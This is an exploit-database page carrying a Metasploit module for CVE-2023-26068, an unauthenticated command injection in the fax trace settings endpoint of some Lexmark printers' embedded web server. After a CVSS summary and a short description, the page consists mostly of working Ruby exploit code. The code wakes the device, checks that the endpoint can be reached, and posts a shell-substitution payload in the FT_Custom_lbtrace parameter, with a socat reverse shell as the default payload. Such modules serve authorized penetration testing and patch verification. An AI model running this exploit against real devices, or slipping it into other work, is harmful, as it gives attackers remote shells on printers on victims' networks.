Lexmark Device Embedded Web Server Remote Code Execution Exploit

2023-09-1900:00:00

metasploit

0day.today

220

lexmark devices

remote code execution

web server

vulnerability

unauthenticated access

admin user

endpoint

authentication bypass

configuration

fax settings

command execution

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

0.209 Low

EPSS

Percentile

96.4%

JSON

An unauthenticated remote code execution vulnerability exists in the embedded webserver in certain Lexmark devices through 2023-02-19. The vulnerability is only exposed if, when setting up the printer or device, the user selects “Set up Later” when asked if they would like to add an Admin user. If no Admin user is created, the endpoint /cgi-bin/fax_change_faxtrace_settings is accessible without authentication. The endpoint allows the user to configure a number of different fax settings. A number of the configurable parameters on the page fail to be sanitized properly before being used in a bash eval statement, allowing for an unauthenticated user to run arbitrary commands.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Retry
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Lexmark Device Embedded Web Server RCE',
        'Description' => %q{
          A unauthenticated Remote Code Execution vulnerability exists in the embedded webserver in certain Lexmark devices through 2023-02-19.
          The vulnerability is only exposed if, when setting up the printer or device, the user selects "Set up Later" when asked
          if they would like to add an Admin user. If no Admin user is created the endpoint `/cgi-bin/fax_change_faxtrace_settings`
          is accessible without authentication. The endpoint allows the user to configure a number of different fax settings.

          A number of the configurable parameters on the page (ex. `FT_Custom_lbtrace`) fail to be sanitized properly before being
          used in an bash eval statement: `eval "$cmd" > /dev/null`, allowing for an unauthenticated user to run arbitrary commands.
        },
        'Author' => [
          'James Horseman', # Analysis & PoC
          'Zach Hanley',    # Analysis & PoC
          'jheysel-r7'      # Msf module
        ],
        'References' => [
          [ 'URL', 'https://github.com/horizon3ai/CVE-2023-26067'],
          [ 'URL', 'https://publications.lexmark.com/publications/security-alerts/CVE-2023-26068.pdf'],
          [ 'URL', 'https://www.horizon3.ai/lexmark-command-injection-vulnerability-zdi-can-19470-pwn2own-toronto-2022/'],
          [ 'CVE', '2023-26068']
        ],
        'License' => MSF_LICENSE,
        'Platform' => ['unix'],
        'Privileged' => false,
        'Arch' => [ ARCH_CMD ],
        'Targets' => [
          [
            'Unix (In-Memory)',
            {
              'Platform' => ['unix'],
              'Arch' => ARCH_CMD,
              'Type' => :unix_cmd,
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/unix/reverse_socat_tcp'
              }
            }
          ]
        ],
        'Payload' => {
          'Compat' =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'socat'
            }
        },
        'DefaultTarget' => 0,
        'DisclosureDate' => '2023-03-13',
        'Notes' => {
          'Stability' => [ CRASH_SAFE ],
          'SideEffects' => [ ],
          'Reliability' => [ REPEATABLE_SESSION ]
        }
      )
    )

    register_options(
      [
        OptInt.new('SLEEP', [true, 'Sleep time to wait for the printer to wake', 10]),
      ]
    )
  end

  def check
    send_wakeup
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, '/cgi-bin/fax_change_faxtrace_settings'),
      'method' => 'GET'
    )

    return Exploit::CheckCode::Unknown('The target did not respond ') unless res
    return Exploit::CheckCode::Safe('The target does not seem to be vulnerable') unless res.code == 200 && res.get_xml_document.xpath('//title').text == 'Fax Trace Settings'

    Exploit::CheckCode::Appears('The vulnerable endpoint "/cgi-bin/fax_change_faxtrace_settings" is reachable')
  end

  # If the printer has been inactive for some time it might be sleeping, in which case it's best to send a request
  # or two to wake it up before running the check method or exploit.
  def send_wakeup
    retry_until_truthy(timeout: datastore['SLEEP']) do
      print_status('Waking up the printer...')
      res = send_request_cgi(
        'uri' => normalize_uri(target_uri.path, '/cgi-bin/fax_change_faxtrace_settings'),
        'method' => 'HEAD'
      )
      break if res && res.code == 200
    end
  end

  def exploit
    if datastore['ForceExploit'] || !datastore['AutoCheck']
      send_wakeup
    end

    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, '/cgi-bin/fax_change_faxtrace_settings'),
      'method' => 'POST',
      'data' => "FT_Custom_lbtrace=3;$(#{payload.encoded});#"
    )
    print_error('A response to the exploit attempt was received. This indicates the exploit was likely unsuccessful') if res
  end
end